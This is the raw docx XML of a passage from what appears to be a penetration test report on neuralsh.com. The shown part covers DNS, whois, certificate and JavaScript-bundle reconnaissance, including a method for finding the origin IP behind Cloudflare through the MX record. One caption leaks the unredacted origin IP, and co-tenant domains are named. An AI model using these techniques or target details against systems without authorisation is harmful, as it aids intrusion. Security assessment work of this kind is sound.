          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>neuralsh.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>104.21.91.198</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Main application — Cloudflare CDN edge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>mail.neuralsh.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>103.16.xx.xxx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Mail + backend server — cPanel shared hosting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>103.16.xx.xxx (direct)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Admin panels, database, MikroTik — 20+ exposed services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 9: Infrastructure map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The main site resolves to Cloudflare's anycast network. The real origin server IP (103.16.xx.xxx) was discovered via the MX record for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mail.neuralsh.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a discovery that bypassed the entire WAF and directly exposed the backend infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.3 Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Reconnaissance was conducted entirely through passive and semi-passive techniques — no traffic was sent to the production application until the scanning phase. The goal was to map as much of the attack surface as possible using only publicly available information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.3.1 WHOIS and Domain Registration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>whois neuralsh.com | grep -E "Registrar|Created|Name Server"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The WHOIS lookup revealed GoDaddy as the domain registrar with a privacy service active (Domains By Proxy LLC), masking the registrant's personal details. The domain was registered on July 3, 2025, making it relatively new. DNS management was delegated to Cloudflare nameservers. This initial finding confirmed that the main site IP would be masked behind Cloudflare's infrastructure — making DNS analysis the primary path for discovering the origin server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="3081560"/>
            <wp:docPr id="21" name="Picture 21"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig45_whois.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="3081560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.5: WHOIS lookup for neuralsh.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.3.2 DNS Enumeration and Origin IP Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS enumeration was the most consequential step of the entire engagement. The following sequence of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands was used to progressively map the DNS records and ultimately reveal the origin server IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Step 1 — A record: Cloudflare CDN IPs</w:t>
        <w:br/>
        <w:t>dig A neuralsh.com</w:t>
        <w:br/>
        <w:t># 104.21.91.198 (Cloudflare anycast — real server hidden)</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step 2 — MX record: reveals mail server hostname</w:t>
        <w:br/>
        <w:t>dig MX neuralsh.com</w:t>
        <w:br/>
        <w:t># mail.neuralsh.com (priority 0)</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step 3 — Resolve mail server: reveals REAL origin IP</w:t>
        <w:br/>
        <w:t>dig A mail.neuralsh.com</w:t>
        <w:br/>
        <w:t># 103.16.xx.xxx — the backend server that Cloudflare is meant to protect</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="5693333"/>
            <wp:docPr id="22" name="Picture 22"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig46_dig_mx.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="5693333"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.6: dig MX — origin IP discovery and DNS records</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This three-step DNS chain revealed 103.16.xx.xxx as the origin server behind the Cloudflare WAF. The MX record is a common oversight — organizations often configure the main domain to proxy through Cloudflare but leave the mail server record pointing directly at the origin. This single lookup rendered the Cloudflare WAF irrelevant for the remainder of the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Additional DNS records were analyzed for further intelligence:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># TXT record — email security posture</w:t>
        <w:br/>
        <w:t>dig TXT neuralsh.com</w:t>
        <w:br/>
        <w:t># v=spf1 +mx +a +ip4:103.16.xx.xxx ~all   (SPF softfail — N-012)</w:t>
        <w:br/>
        <w:t># v=DMARC1; p=quarantine                   (DMARC not enforcing — N-012)</w:t>
        <w:br/>
        <w:br/>
        <w:t># Wildcard DNS — any subdomain resolves</w:t>
        <w:br/>
        <w:t>dig randomxyz123.neuralsh.com</w:t>
        <w:br/>
        <w:t># Returns: 103.16.xx.xxx   (wildcard DNS active — N-010)</w:t>
        <w:br/>
        <w:br/>
        <w:t># Zone transfer — blocked (positive control)</w:t>
        <w:br/>
        <w:t>dig axfr @ns1.cloudflare.com neuralsh.com</w:t>
        <w:br/>
        <w:t># Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="1859568"/>
            <wp:docPr id="23" name="Picture 23"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig47_wildcard_dns.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="1859568"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.7: dig confirming wildcard DNS resolves to 103.16.62.217</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.3.3 SSL Certificate Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The SSL certificate on the origin server disclosed infrastructure details that confirmed the server's hosting environment and identified a co-tenant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>openssl s_client -connect 103.16.xx.xxx:443 2&gt;/dev/null | openssl x509 -noout -subject -issuer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="806400"/>
            <wp:docPr id="24" name="Picture 24"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig48_ssl_cert.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="806400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.8: SSL certificate mismatch — endoncambodia.com / onesala.com on origin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The certificate returned was issued to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>www.endoncambodia.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — not neuralsh.com. The Subject Alternative Names included </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>cpanel.endoncambodia.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mail.endoncambodia.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>webmail.endoncambodia.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Mail service certificates on ports 110, 143, 465, 587, 993, and 995 were issued to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*.onesala.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. This combination of evidence confirmed two important facts: the server is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shared cPanel hosting environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> hosting multiple clients simultaneously, and at least two other organizations (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>endoncambodia.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>onesala.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) share the same physical server as neuralsh.com.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.3.4 JavaScript Bundle Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A key reconnaissance technique for Nuxt.js applications is extracting API route structures from the compiled JavaScript bundles that ship to the browser. Since the frontend is a Single-Page Application, all API endpoints are compiled into the client-side bundle and are publicly accessible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Extract API routes from the main Nuxt.js bundle</w:t>
        <w:br/>
        <w:t>curl -s https://neuralsh.com/_nuxt/Bpuv52g-.js | grep -oP '/web/v1/[^"&amp;\s]+' | sort -u</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>API Routes Discovered:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/web/v1/init/token</w:t>
        <w:br/>
        <w:t>/web/v1/category</w:t>
        <w:br/>
        <w:t>/web/v1/text/search</w:t>
        <w:br/>
        <w:t>/web/v1/image/search</w:t>
        <w:br/>
        <w:t>/web/v1/report/save</w:t>
        <w:br/>
        <w:t>/api/geocode</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 which was later exploited — was discovered here without any port scanning or directory brute force. The entire API surface was self-disclosed via the client-side JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.4 Scanning and Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>With the origin IP confirmed, active scanning was conducted against 103.16.xx.xxx to identify all exposed services and their versions. Scanning was performed from the Kali VM via SSH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
